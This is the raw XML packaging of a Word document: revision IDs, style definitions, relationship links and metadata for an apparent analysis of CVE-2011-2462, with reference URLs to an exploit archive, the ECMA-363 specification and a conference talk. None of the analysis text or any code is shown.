    <w:rsid w:val="00993A0A"/>
    <w:rsid w:val="00993EEC"/>
    <w:rsid w:val="00994586"/>
    <w:rsid w:val="00997261"/>
    <w:rsid w:val="009A008F"/>
    <w:rsid w:val="009A0765"/>
    <w:rsid w:val="009A1682"/>
    <w:rsid w:val="009A3342"/>
    <w:rsid w:val="009A6CB8"/>
    <w:rsid w:val="009B1D7D"/>
    <w:rsid w:val="009B3A28"/>
    <w:rsid w:val="009B3B37"/>
    <w:rsid w:val="009B7730"/>
    <w:rsid w:val="009C04CD"/>
    <w:rsid w:val="009C3BFB"/>
    <w:rsid w:val="009C6523"/>
    <w:rsid w:val="009D2748"/>
    <w:rsid w:val="009E45A0"/>
    <w:rsid w:val="009F672C"/>
    <w:rsid w:val="00A00B2A"/>
    <w:rsid w:val="00A056A1"/>
    <w:rsid w:val="00A07C78"/>
    <w:rsid w:val="00A14795"/>
    <w:rsid w:val="00A14D21"/>
    <w:rsid w:val="00A1629C"/>
    <w:rsid w:val="00A30B24"/>
    <w:rsid w:val="00A33D37"/>
    <w:rsid w:val="00A33F8F"/>
    <w:rsid w:val="00A51C00"/>
    <w:rsid w:val="00A54B4B"/>
    <w:rsid w:val="00A54FC4"/>
    <w:rsid w:val="00A55DF3"/>
    <w:rsid w:val="00A57FE3"/>
    <w:rsid w:val="00A63695"/>
    <w:rsid w:val="00A70C2D"/>
    <w:rsid w:val="00A80BB0"/>
    <w:rsid w:val="00A84E72"/>
    <w:rsid w:val="00A87AB7"/>
    <w:rsid w:val="00A958CB"/>
    <w:rsid w:val="00AA109E"/>
    <w:rsid w:val="00AA1862"/>
    <w:rsid w:val="00AA286A"/>
    <w:rsid w:val="00AB4F55"/>
    <w:rsid w:val="00AC331D"/>
    <w:rsid w:val="00AC5172"/>
    <w:rsid w:val="00AD0443"/>
    <w:rsid w:val="00AD208B"/>
    <w:rsid w:val="00AD20F9"/>
    <w:rsid w:val="00AD3311"/>
    <w:rsid w:val="00AD3C1E"/>
    <w:rsid w:val="00AD6C8E"/>
    <w:rsid w:val="00AE0CFA"/>
    <w:rsid w:val="00AE2EA1"/>
    <w:rsid w:val="00AE6AAE"/>
    <w:rsid w:val="00AF2FB6"/>
    <w:rsid w:val="00AF611F"/>
    <w:rsid w:val="00B05810"/>
    <w:rsid w:val="00B13FB2"/>
    <w:rsid w:val="00B149BC"/>
    <w:rsid w:val="00B15AB4"/>
    <w:rsid w:val="00B231CC"/>
    <w:rsid w:val="00B25F0C"/>
    <w:rsid w:val="00B27013"/>
    <w:rsid w:val="00B34E2A"/>
    <w:rsid w:val="00B363F4"/>
    <w:rsid w:val="00B36BDC"/>
    <w:rsid w:val="00B41012"/>
    <w:rsid w:val="00B41035"/>
    <w:rsid w:val="00B45B80"/>
    <w:rsid w:val="00B45E0C"/>
    <w:rsid w:val="00B4697D"/>
    <w:rsid w:val="00B47EFE"/>
    <w:rsid w:val="00B53412"/>
    <w:rsid w:val="00B5694F"/>
    <w:rsid w:val="00B6424C"/>
    <w:rsid w:val="00B6475E"/>
    <w:rsid w:val="00B6699B"/>
    <w:rsid w:val="00B67330"/>
    <w:rsid w:val="00B70302"/>
    <w:rsid w:val="00B7662F"/>
    <w:rsid w:val="00B820CC"/>
    <w:rsid w:val="00B82C9F"/>
    <w:rsid w:val="00B82FA1"/>
    <w:rsid w:val="00B84679"/>
    <w:rsid w:val="00B85621"/>
    <w:rsid w:val="00B90357"/>
    <w:rsid w:val="00B9229E"/>
    <w:rsid w:val="00B940C0"/>
    <w:rsid w:val="00B95C0F"/>
    <w:rsid w:val="00B9738E"/>
    <w:rsid w:val="00BA050E"/>
    <w:rsid w:val="00BA171E"/>
    <w:rsid w:val="00BA43E2"/>
    <w:rsid w:val="00BA5440"/>
    <w:rsid w:val="00BA73D3"/>
    <w:rsid w:val="00BB5BDF"/>
    <w:rsid w:val="00BB61E1"/>
    <w:rsid w:val="00BC6736"/>
    <w:rsid w:val="00BC78EB"/>
    <w:rsid w:val="00BC7E41"/>
    <w:rsid w:val="00BD0092"/>
    <w:rsid w:val="00BD3BC5"/>
    <w:rsid w:val="00BD4916"/>
    <w:rsid w:val="00BD7B68"/>
    <w:rsid w:val="00BE0BDF"/>
    <w:rsid w:val="00BE58DC"/>
    <w:rsid w:val="00BF3737"/>
    <w:rsid w:val="00BF411C"/>
    <w:rsid w:val="00BF7EAE"/>
    <w:rsid w:val="00C05502"/>
    <w:rsid w:val="00C1291B"/>
    <w:rsid w:val="00C12ABC"/>
    <w:rsid w:val="00C12D64"/>
    <w:rsid w:val="00C13CF9"/>
    <w:rsid w:val="00C148DB"/>
    <w:rsid w:val="00C206B1"/>
    <w:rsid w:val="00C22571"/>
    <w:rsid w:val="00C26209"/>
    <w:rsid w:val="00C26AD1"/>
    <w:rsid w:val="00C3371A"/>
    <w:rsid w:val="00C372FE"/>
    <w:rsid w:val="00C43402"/>
    <w:rsid w:val="00C4443A"/>
    <w:rsid w:val="00C44CF7"/>
    <w:rsid w:val="00C47D51"/>
    <w:rsid w:val="00C55751"/>
    <w:rsid w:val="00C60B6C"/>
    <w:rsid w:val="00C63FBF"/>
    <w:rsid w:val="00C6438B"/>
    <w:rsid w:val="00C7023E"/>
    <w:rsid w:val="00C77C53"/>
    <w:rsid w:val="00C80159"/>
    <w:rsid w:val="00C85D4B"/>
    <w:rsid w:val="00C87319"/>
    <w:rsid w:val="00C915F8"/>
    <w:rsid w:val="00C97106"/>
    <w:rsid w:val="00CA3AEE"/>
    <w:rsid w:val="00CB181E"/>
    <w:rsid w:val="00CB79E2"/>
    <w:rsid w:val="00CC6844"/>
    <w:rsid w:val="00CC6A59"/>
    <w:rsid w:val="00CC6E5E"/>
    <w:rsid w:val="00CC746D"/>
    <w:rsid w:val="00CD1BB3"/>
    <w:rsid w:val="00CD6282"/>
    <w:rsid w:val="00CE10C4"/>
    <w:rsid w:val="00CE27E0"/>
    <w:rsid w:val="00CE3503"/>
    <w:rsid w:val="00CE566E"/>
    <w:rsid w:val="00CF6823"/>
    <w:rsid w:val="00CF7DDF"/>
    <w:rsid w:val="00D05D80"/>
    <w:rsid w:val="00D12928"/>
    <w:rsid w:val="00D158BA"/>
    <w:rsid w:val="00D203F5"/>
    <w:rsid w:val="00D2286F"/>
    <w:rsid w:val="00D24D04"/>
    <w:rsid w:val="00D34FC6"/>
    <w:rsid w:val="00D376CB"/>
    <w:rsid w:val="00D4298E"/>
    <w:rsid w:val="00D42BD6"/>
    <w:rsid w:val="00D42BF3"/>
    <w:rsid w:val="00D4372D"/>
    <w:rsid w:val="00D467E6"/>
    <w:rsid w:val="00D47DD1"/>
    <w:rsid w:val="00D47FC4"/>
    <w:rsid w:val="00D51774"/>
    <w:rsid w:val="00D521FD"/>
    <w:rsid w:val="00D56010"/>
    <w:rsid w:val="00D7122F"/>
    <w:rsid w:val="00D72C1A"/>
    <w:rsid w:val="00D7529C"/>
    <w:rsid w:val="00D77AC2"/>
    <w:rsid w:val="00D928B5"/>
    <w:rsid w:val="00D9625D"/>
    <w:rsid w:val="00DA3A96"/>
    <w:rsid w:val="00DA5F4A"/>
    <w:rsid w:val="00DA62C9"/>
    <w:rsid w:val="00DA644B"/>
    <w:rsid w:val="00DA68AB"/>
    <w:rsid w:val="00DA6FFD"/>
    <w:rsid w:val="00DB07CB"/>
    <w:rsid w:val="00DB7BCB"/>
    <w:rsid w:val="00DC04D7"/>
    <w:rsid w:val="00DC0636"/>
    <w:rsid w:val="00DD55FA"/>
    <w:rsid w:val="00DD73DA"/>
    <w:rsid w:val="00DE657F"/>
    <w:rsid w:val="00DF31DE"/>
    <w:rsid w:val="00E02995"/>
    <w:rsid w:val="00E03290"/>
    <w:rsid w:val="00E0542C"/>
    <w:rsid w:val="00E13C97"/>
    <w:rsid w:val="00E2340A"/>
    <w:rsid w:val="00E234A6"/>
    <w:rsid w:val="00E25D98"/>
    <w:rsid w:val="00E269A7"/>
    <w:rsid w:val="00E27AD6"/>
    <w:rsid w:val="00E35BAF"/>
    <w:rsid w:val="00E42F5C"/>
    <w:rsid w:val="00E431A5"/>
    <w:rsid w:val="00E47368"/>
    <w:rsid w:val="00E521B2"/>
    <w:rsid w:val="00E54232"/>
    <w:rsid w:val="00E57B6A"/>
    <w:rsid w:val="00E57C9F"/>
    <w:rsid w:val="00E636AC"/>
    <w:rsid w:val="00E65A48"/>
    <w:rsid w:val="00E7043E"/>
    <w:rsid w:val="00E71A43"/>
    <w:rsid w:val="00E73B78"/>
    <w:rsid w:val="00E77429"/>
    <w:rsid w:val="00E84E32"/>
    <w:rsid w:val="00E91A81"/>
    <w:rsid w:val="00EA0780"/>
    <w:rsid w:val="00EB5963"/>
    <w:rsid w:val="00EB6D1F"/>
    <w:rsid w:val="00EC13BF"/>
    <w:rsid w:val="00EC5FB1"/>
    <w:rsid w:val="00ED6E1C"/>
    <w:rsid w:val="00EE21E6"/>
    <w:rsid w:val="00EE5029"/>
    <w:rsid w:val="00EE6B16"/>
    <w:rsid w:val="00F01D90"/>
    <w:rsid w:val="00F0292C"/>
    <w:rsid w:val="00F158C8"/>
    <w:rsid w:val="00F1623E"/>
    <w:rsid w:val="00F1675E"/>
    <w:rsid w:val="00F16E5C"/>
    <w:rsid w:val="00F2046A"/>
    <w:rsid w:val="00F26259"/>
    <w:rsid w:val="00F3264E"/>
    <w:rsid w:val="00F37655"/>
    <w:rsid w:val="00F5252F"/>
    <w:rsid w:val="00F5347A"/>
    <w:rsid w:val="00F56935"/>
    <w:rsid w:val="00F61396"/>
    <w:rsid w:val="00F64AB3"/>
    <w:rsid w:val="00F71AC8"/>
    <w:rsid w:val="00F735CF"/>
    <w:rsid w:val="00F77097"/>
    <w:rsid w:val="00F80A99"/>
    <w:rsid w:val="00F80C1A"/>
    <w:rsid w:val="00F86AB1"/>
    <w:rsid w:val="00F91D30"/>
    <w:rsid w:val="00F93B4F"/>
    <w:rsid w:val="00F945AE"/>
    <w:rsid w:val="00F97B82"/>
    <w:rsid w:val="00FA0176"/>
    <w:rsid w:val="00FA2C47"/>
    <w:rsid w:val="00FA5DC5"/>
    <w:rsid w:val="00FB3193"/>
    <w:rsid w:val="00FB3D4D"/>
    <w:rsid w:val="00FC1E44"/>
    <w:rsid w:val="00FC2A09"/>
    <w:rsid w:val="00FC68FD"/>
    <w:rsid w:val="00FC7534"/>
    <w:rsid w:val="00FD3622"/>
    <w:rsid w:val="00FD5031"/>
    <w:rsid w:val="00FD62F1"/>
    <w:rsid w:val="00FD791B"/>
    <w:rsid w:val="00FD7EE5"/>
    <w:rsid w:val="00FE1070"/>
    <w:rsid w:val="00FE11DC"/>
    <w:rsid w:val="00FE1C4C"/>
    <w:rsid w:val="00FE1FFD"/>
    <w:rsid w:val="00FE51A2"/>
    <w:rsid w:val="00FF2790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8"/>
        <o:r id="V:Rule6" type="connector" idref="#_x0000_s1047"/>
        <o:r id="V:Rule7" type="connector" idref="#_x0000_s1046"/>
        <o:r id="V:Rule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64"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005A686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86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86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86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6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6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6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6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6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6864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6864"/>
    <w:rPr>
      <w:smallCaps/>
      <w:spacing w:val="5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E45A0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="006012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68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86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686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6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6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6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6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6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686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86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6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6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A6864"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="005A6864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A68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686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A686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6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64"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="005A6864"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005A68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6864"/>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005A686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A686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686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45A0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0065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23E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0065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3E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C02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2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270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2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2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downloads.securityfocus.com/vulnerabilities/exploits/50922.rb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ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20Edition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lackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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14CC6B-4CE8-45CC-875C-50716081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Analysis</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>MyCompany</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>18759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Analysis</dc:title>
  <dc:subject>CVE-2011-2462</dc:subject>
  <dc:creator>Yeo Quan Yang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Customer</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-28T07:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-28T07:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>